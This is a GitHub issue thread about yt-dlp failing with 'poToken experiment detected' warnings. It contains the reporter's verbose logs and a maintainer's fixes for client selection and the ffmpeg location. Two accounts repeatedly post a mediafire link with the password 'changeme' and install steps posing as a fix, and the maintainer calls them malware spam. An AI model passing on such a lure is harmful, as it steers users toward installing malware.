### ISSUE TITLE
Youtube: Broken Formats / poToken experiment with 2024.08.06

### ISSUE THREAD

**Issue by MrSmite** [yt-dlp/yt-dlp#10886]
### DO NOT REMOVE OR SKIP THE ISSUE TEMPLATE

- [X] I understand that I will be **blocked** if I *intentionally* remove or skip any mandatory\* field

### Checklist

- [X] I'm reporting that yt-dlp is broken on a **supported** site
- [X] I've verified that I have **updated yt-dlp to nightly or master** ([update instructions](https://github.com/yt-dlp/yt-dlp#update-channels))
- [X] I've checked that all provided URLs are playable in a browser with the same IP and same login details
- [X] I've checked that all URLs and arguments with special characters are [properly quoted or escaped](https://github.com/yt-dlp/yt-dlp/wiki/FAQ#video-url-contains-an-ampersand--and-im-getting-some-strange-output-1-2839-or-v-is-not-recognized-as-an-internal-or-external-command)
- [X] I've searched [known issues](https://github.com/yt-dlp/yt-dlp/issues/3766) and the [bugtracker](https://github.com/yt-dlp/yt-dlp/issues?q=) for similar issues **including closed ones**. DO NOT post duplicates
- [X] I've read the [guidelines for opening an issue](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#opening-an-issue)
- [X] I've read about [sharing account credentials](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#are-you-willing-to-share-account-details-if-needed) and I'm willing to share it if required

### Region

US

### Provide a description that is worded well enough to be understood

I wrote a batch script that first gets the user channel id so I can use it in the folder name. It then proceeds to download the video (can be single or "videos" tab). During the extraction of the user channel ID I use the same commands as I do to download except I add the --simulate option so it doesn't download anything.

Sometimes when yt-dlp is simulating, I get the error saying "broken formats, poToken experiment detected" and this might be followed by a "log in to determine you're not a bot" but often it works. After the script starts downloading the video, there is a chance it will also return the poToken error.

In the log below, you will see "getting channel info", this is where my script asks yt-dlp to simulate the download. Then you will see a line that asks for a subfolder, which is part of my script too. I leave it blank and after that yt-dlp is asked to download the file.

### Provide verbose output that clearly demonstrates the problem

- [X] Run **your** yt-dlp command with **-vU** flag added (`yt-dlp -vU <your command line>`)
- [ ] If using API, add `'verbose': True` to `YoutubeDL` params instead
- [X] Copy the WHOLE output (starting with `[debug] Command-line config`) and insert it below

### Complete Verbose Output

```shell
> Getting channel info...

[debug] Command-line config: ['-vU', '--extractor-args', 'youtube:player_client=ios,web', '--cache-dir', '\\\\media_server\\v\\youtube\\_ytdlp_cache\\20240831_005430-19', '--simulate', '--playlist-reverse', '--playlist-start', '1', '--playlist-end', '1', '--print-to-file', '%(uploader_id)s', '\\\\\\\\media_server\\v\\youtube\\_ytdlp_cache\\20240831_005430-19\\ytdlp_chid.tmp', 'https://www.youtube.com/watch?v=RhaEOEGDb94']
[debug] Encodings: locale cp1252, fs utf-8, pref cp1252, out cp1252, error utf-8, screen cp1252
[debug] yt-dlp version stable@2024.08.06 from yt-dlp/yt-dlp [4d9231208] (win_exe)
[debug] Python 3.8.10 (CPython AMD64 64bit) - Windows-10-10.0.19045-SP0 (OpenSSL 1.1.1k  25 Mar 2021)
[debug] exe versions: none
[debug] Optional libraries: Cryptodome-3.20.0, brotli-1.1.0, certifi-2024.07.04, curl_cffi-0.5.10, mutagen-1.47.0, requests-2.32.3, sqlite3-3.35.5, urllib3-2.2.2, websockets-12.0
[debug] Request Handlers: urllib, requests, websockets, curl_cffi
[debug] Loaded 1830 extractors
[debug] Fetching release info: https://api.github.com/repos/yt-dlp/yt-dlp/releases/latest
WARNING: [youtube] Webpage contains broken formats (poToken experiment detected). Ignoring initial player response
WARNING: [youtube] API returned broken formats (poToken experiment detected). Retrying (1/3)...
WARNING: [youtube] API returned broken formats (poToken experiment detected). Retrying (2/3)...
WARNING: [youtube] API returned broken formats (poToken experiment detected). Retrying (3/3)...
WARNING: [youtube] API returned broken formats (poToken experiment detected). Giving up after 3 retries
[debug] Sort order given by extractor: quality, res, fps, hdr:12, source, vcodec:vp9.2, channels, acodec, lang, proto
[debug] Formats sorted by: hasvid, ie_pref, quality, res, fps, hdr:12(7), source, vcodec:vp9.2(10), channels, acodec, lang, proto, size, br, asr, vext, aext, hasaud, id
[debug] Default format spec: best/bestvideo+bestaudio
[debug] Command-line config: ['-vU', '--extractor-args', 'youtube:player_client=ios,web', '--cache-dir', '\\\\media_server\\v\\youtube\\_ytdlp_cache\\20240831_005430-19', '--simulate', '--playlist-start', '1', '--playlist-end', '1', '--print-to-file', '%(channel)s', '\\\\media_server\\v\\youtube\\_ytdlp_cache\\20240831_005430-19\\ytdlp_chn.tmp', 'https://www.youtube.com/watch?v=RhaEOEGDb94']
[debug] Encodings: locale cp1252, fs utf-8, pref cp1252, out cp1252, error utf-8, screen cp1252
[debug] yt-dlp version stable@2024.08.06 from yt-dlp/yt-dlp [4d9231208] (win_exe)
[debug] Python 3.8.10 (CPython AMD64 64bit) - Windows-10-10.0.19045-SP0 (OpenSSL 1.1.1k  25 Mar 2021)
[debug] exe versions: none
[debug] Optional libraries: Cryptodome-3.20.0, brotli-1.1.0, certifi-2024.07.04, curl_cffi-0.5.10, mutagen-1.47.0, requests-2.32.3, sqlite3-3.35.5, urllib3-2.2.2, websockets-12.0
[debug] Request Handlers: urllib, requests, websockets, curl_cffi
[debug] Loaded 1830 extractors
[debug] Fetching release info: https://api.github.com/repos/yt-dlp/yt-dlp/releases/latest
WARNING: [youtube] Webpage contains broken formats (poToken experiment detected). Ignoring initial player response
WARNING: [youtube] API returned broken formats (poToken experiment detected). Retrying (1/3)...
WARNING: [youtube] API returned broken formats (poToken experiment detected). Retrying (2/3)...
WARNING: [youtube] API returned broken formats (poToken experiment detected). Retrying (3/3)...
WARNING: [youtube] API returned broken formats (poToken experiment detected). Giving up after 3 retries
[debug] Sort order given by extractor: quality, res, fps, hdr:12, source, vcodec:vp9.2, channels, acodec, lang, proto
[debug] Formats sorted by: hasvid, ie_pref, quality, res, fps, hdr:12(7), source, vcodec:vp9.2(10), channels, acodec, lang, proto, size, br, asr, vext, aext, hasaud, id
[debug] Default format spec: best/bestvideo+bestaudio

   Channel ID: @Jayztwocents


> Download root: \\\\media_server\\v\\youtube\\@Jayztwocents

> Subfolder (BLANK for none, R to restart, X to quit):


> Downloading to:

   \\\\media_server\\v\\youtube\\@Jayztwocents


> Choose (BLANK to start, F change subfolder, R to restart, X to quit):

> Downloading audio and video (single file)

[debug] Command-line config: ['--cache-dir', '\\\\media_server\\v\\youtube\\_ytdlp_cache\\20240831_005430-19', '--download-archive', '\\\\media_server\\v\\youtube\\_ytdlp_cache\\@Jayztwocents\\_db\\av.txt', '--hls-prefer-native', '--ffmpeg-location', 'D:\\Apps\\ytdlp\\ytdlp_ffmpeg\\bin', '-f', 'bv*+ba', '-vU', '--no-abort-on-error', '--extractor-args', 'youtube:player_client=ios,web', '--throttled-rate', '10K', '--buffer-size', '16K', '--http-chunk-size', '10M', '--no-call-home', '--embed-chapters', '--no-embed-thumbnail', '--no-embed-info-json', '--windows-filenames', '--merge-output-format', 'mp4', '--extractor-args', 'youtube:skip=dash', '--retries', '20', '--no-embed-metadata', '-o', '\\\\media_server\\v\\youtube\\@Jayztwocents\\%(title)s_%(upload_date)s.%(ext)s', 'https://www.youtube.com/watch?v=RhaEOEGDb94']
[debug] Encodings: locale cp1252, fs utf-8, pref cp1252, out utf-8, error utf-8, screen utf-8
[debug] yt-dlp version stable@2024.08.06 from yt-dlp/yt-dlp [4d9231208] (win_exe)
[debug] Python 3.8.10 (CPython AMD64 64bit) - Windows-10-10.0.19045-SP0 (OpenSSL 1.1.1k  25 Mar 2021)
[debug] exe versions: ffmpeg N-116796-gb730defd52-20240830 (setts), ffprobe N-116796-gb730defd52-20240830
[debug] Optional libraries: Cryptodome-3.20.0, brotli-1.1.0, certifi-2024.07.04, curl_cffi-0.5.10, mutagen-1.47.0, requests-2.32.3, sqlite3-3.35.5, urllib3-2.2.2, websockets-12.0
[debug] Proxy map: {'all': 'socks5://127.0.0.1:9150'}
[debug] Request Handlers: urllib, requests, websockets, curl_cffi
[debug] Loaded 1830 extractors
[debug] Loading archive file '\\\\media_server\\v\\youtube\\@Jayztwocents\\_db\\av.txt'
[debug] Fetching release info: https://api.github.com/repos/yt-dlp/yt-dlp/releases/latest
Latest version: stable@2024.08.06 from yt-dlp/yt-dlp
yt-dlp is up to date (stable@2024.08.06 from yt-dlp/yt-dlp)
[youtube] Extracting URL: https://www.youtube.com/watch?v=RhaEOEGDb94
[youtube] RhaEOEGDb94: Downloading webpage
[youtube] RhaEOEGDb94: Downloading ios player API JSON
[youtube] RhaEOEGDb94: Downloading web creator player API JSON
[youtube] RhaEOEGDb94: Downloading player 57c75fa4
[debug] Saving youtube-nsig.57c75fa4 to cache
[debug] [youtube] Decrypted nsig ELQzpE6PfGr1pbQ => FTbYJvrxpLnQqg
[youtube] RhaEOEGDb94: Downloading m3u8 information
[debug] Sort order given by extractor: quality, res, fps, hdr:12, source, vcodec:vp9.2, channels, acodec, lang, proto
[debug] Formats sorted by: hasvid, ie_pref, quality, res, fps, hdr:12(7), source, vcodec:vp9.2(10), channels, acodec, lang, proto, size, br, asr, vext, aext, hasaud, id
[info] RhaEOEGDb94: Downloading 1 format(s): 313+251
[debug] Invoking http downloader on "https://rr1---sn-oxmua5txg-8pxe.googlevideo.com/videoplayback?expire=1725101849&ei=uaLSZrDWIYHPi9oP6MqLmA0&ip=2a03%3Ae600%3A100%3A%3A66&id=o-AFXB8QSLgCYeSbxH1jzk9sz-ReHsvssQKFNYO1qQYv2Q&itag=313&source=youtube&requiressl=yes&xpc=EgVo2aDSNQ%3D%3D&mh=NI&mm=31%2C29&mn=sn-oxmua5txg-8pxe%2Csn-h0jeenl6&ms=au%2Crdu&mv=m&mvi=1&pcm2cms=yes&pl=48&initcwndbps=636250&vprv=1&svpuc=1&mime=video%2Fwebm&rqh=1&gir=yes&clen=2037754396&dur=1382.881&lmt=1724807557392761&mt=1725079976&fvip=2&keepalive=yes&c=IOS&txp=5532434&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cxpc%2Cvprv%2Csvpuc%2Cmime%2Crqh%2Cgir%2Cclen%2Cdur%2Clmt&sig=AJfQdSswRgIhAPyn35bZPC-vYP60an0ko5K2YcERgW189eRw2Al60zcoAiEAwZefsxGAWk_CpwSK-9xT3QOieOE6HKpATl12S_yLy6w%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpcm2cms%2Cpl%2Cinitcwndbps&lsig=AGtxev0wRQIhAI4ye5Xv5iY9TPm-xGRsiqdaRfsc2p6w1oNPvlpQHO5_AiBAk13cVzQarSec3atxMiX7xK1l5old2dMKVHJkgr2xmA%3D%3D"
[debug] File locking is not supported. Proceeding without locking
[download] Destination: \\media_server\v\youtube\@Jayztwocents\Does what Thermal Paste you use, REALLY matter？_20240826.f313.webm
[download]   3.1% of    1.90GiB at    4.37MiB/s ETA 07:10
ERROR: Interrupted by user
```

**Comment by bashonly** [comment]
You're passing `--extractor-args "youtube:player_client=ios,web"`. Don't do that. `web` is no longer a default client because it is now broken by po token enforcement.

**Comment by MrSmite** [comment]
Thank you, that worked but removing --extractor-args caused a new error:

> WARNING: ffmpeg not found. The downloaded format may not be the best available. Installing ffmpeg is strongly recommended: https://github.com/yt-dlp/yt-dlp#dependencies
WARNING: ffmpeg not found. The downloaded format may not be the best available. Installing ffmpeg is strongly recommended: https://github.com/yt-dlp/yt-dlp#dependencies

**Comment by MrSmite** [comment]
I have the custom build of ffmpeg from the dependencies page, in the same path as yt-dlp. This error doesn't happen if I use this:

>--extractor_args="youtube:player_client=ios"

**Comment by bashonly** [comment]
> [debug] exe versions: none

ffmpeg is not found in your PATH or in the same folder as your yt-dlp.exe

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by MrSmite** [comment]
> ffmpeg is not found in your PATH or in the same folder as your yt-dlp.exe

It is there, and I supply it on the commandline too:

>D:\\Apps\\ytdlp\\ytdlp_ffmpeg\\bin


> Directory of D:\Apps\ytdlp\ytdlp_ffmpeg\bin

08/31/2024  01:28 AM    <DIR>          .
08/31/2024  01:28 AM    <DIR>          ..
08/30/2024  02:06 PM       130,452,992 ffmpeg.exe
08/31/2024  01:28 AM                 0 ffmpeg_dir.txt
08/30/2024  02:06 PM       130,306,048 ffplay.exe
08/30/2024  02:06 PM       130,325,504 ffprobe.exe
               4 File(s)    391,084,544 bytes
               2 Dir(s)  89,595,621,376 bytes free

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by bashonly** [comment]
don't follow any of those links posted by the malware spammers

**Comment by MrSmite** [comment]
So just confirming, if I add back the parameter:

>--extractor-args "youtube:player_client=ios"

I do not get the ffmpeg error. Not sure why that is, as mentioned above, I am passing the ffmpeg location too.

**Comment by bashonly** [comment]
In your original log, you are not passing the `--ffmpeg-location` arg in the first run where you are getting the error

**Comment by MrSmite** [comment]
> In your original log, you are not passing the `--ffmpeg-location` arg in the first run where you are getting the warning

Good catch, thank you. I will fix that.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
